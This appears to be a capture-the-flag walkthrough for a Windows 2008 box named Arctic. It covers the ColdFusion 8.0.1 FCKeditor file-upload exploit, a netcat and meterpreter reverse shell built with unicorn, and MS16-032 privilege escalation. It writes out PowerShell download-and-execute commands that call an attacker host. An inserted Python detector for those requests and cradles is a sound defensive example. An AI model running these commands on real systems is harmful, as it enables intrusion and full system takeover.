OS: Windows 2008
Ports / Services / Software versions running
135/tcp   open  msrpc  Microsoft Windows RPC
8500/tcp  open  http   JRun Web Server
49154/tcp open  msrpc  Microsoft Windows RPC
ColdFusion 8.0.1 Arbitrary File Upload and Execute
This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.
MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
Replicating the exploit:
Webapp on port 8500
The ColdFusion administrator page reports version 8.
Found the metasploit version of the exploit
Set options as follows
Start burp listener on port 127.0.0.1:8500
Check it works in the browser
Capture the request in burp
Check the filename it is writing to.
Navigate to that file via the browser and set up your nc listener on port 4444
Gather system info etc
Grab user file
Execute Sherlock.ps1 after copying it to your pwd and starting your webserver.
echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -
Did not work, so try getting a meterpreter shell instead.
git clone https://github.com/trustedsec/unicorn.git
python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445
msfconsole -r unicorn.rc
cat powershell_attack.txt > exploit.html
nano exploit.html
Delete the leading text from powershell up to 'sv, including that single quote and the matching quote at the end.
Copy to your webserver
Run the following on Arctic
powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"
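From the blue-team side, the two things this box leaves in telemetry are the FCKeditor 'CurrentFolder' upload request (the ColdFusion step above) and the PowerShell download cradle used on the host (both the echo-piped Invoke-MS16032 line and the exploit.html line). The following detector is an added example, not part of the original walkthrough; the access-log lines and process command lines are constructed, and the FCKeditor connector path in the sample is assumed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample telemetry (not from the walkthrough): two access-log lines
# in combined log format and three process-creation command lines. The connector
# path under /CFIDE/ is an assumption made for the sample only.
WEB_LOG = [
    '10.10.14.2 - - [22/Mar/2017:10:01:07 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 3104',
    '10.10.14.2 - - [22/Mar/2017:10:02:31 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/'
    'filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 512',
]
PROC_LOG = [
    'powershell -noprofile -',   # script arrived on stdin: nothing of it is on the command line
    'powershell "iex(new-object net.webclient).downloadstring(\'http://10.10.14.2/exploit.html\')"',
    'C:\\Windows\\System32\\notepad.exe',
]

# Request line inside a combined-format access log entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Pieces of the classic PowerShell download cradle, matched case-insensitively
# because PowerShell itself is case-insensitive.
DOWNLOAD_RE = re.compile(r"\.downloadstring\s*\(", re.I)
WEBCLIENT_RE = re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# "powershell ... -" with a bare trailing dash reads the script from stdin.
STDIN_RE = re.compile(r"powershell(?:\.exe)?\b.*\s-\s*$", re.I)


def is_fckeditor_upload(logline):
    """True when a POST reaches an FCKeditor connector with a CurrentFolder parameter."""
    m = REQ_RE.search(logline)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    keys = {k.lower() for k in parse_qs(parts.query)}
    return (m.group("method") == "POST"
            and "fckeditor" in parts.path.lower()
            and "currentfolder" in keys)


def classify_powershell(cmdline):
    """Label a process command line; None when it is not PowerShell at all."""
    if not re.search(r"powershell(?:\.exe)?", cmdline, re.I):
        return None
    if DOWNLOAD_RE.search(cmdline) and (WEBCLIENT_RE.search(cmdline) or IEX_RE.search(cmdline)):
        return "download-cradle"
    if STDIN_RE.search(cmdline):
        # Content is invisible here; Script Block Logging (event 4104) is needed to see it.
        return "script-from-stdin"
    return "benign-or-unknown"


def scan(web_lines, proc_lines):
    """Return (source, label, raw line) for every line worth an analyst's attention."""
    findings = []
    for line in web_lines:
        if is_fckeditor_upload(line):
            findings.append(("web", "fckeditor-upload", line))
    for cmd in proc_lines:
        label = classify_powershell(cmd)
        if label in ("download-cradle", "script-from-stdin"):
            findings.append(("proc", label, cmd))
    return findings


if __name__ == "__main__":
    for source, label, raw in scan(WEB_LOG, PROC_LOG):
        print(f"[{source}] {label}: {raw}")
```

Note the echo-piped form of the Invoke-MS16032 line: the only thing a process-creation event records for it is "powershell -noprofile -", so command-line matching alone classifies it as script-from-stdin rather than as a cradle. Catching the content of that variant needs PowerShell Script Block Logging, which is the practical mitigation gap this box demonstrates; the FCKeditor hit is the earlier, cheaper signal since it appears in the web server's own access log.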
Run the local exploit suggester (32-bit).
This ran as 32-bit, so switch to meterpreter and migrate to a 64-bit process.
Running the suggester as 64-bit returns only one suggestion.
Set your options as follows:
Run the exploit to get a system shell.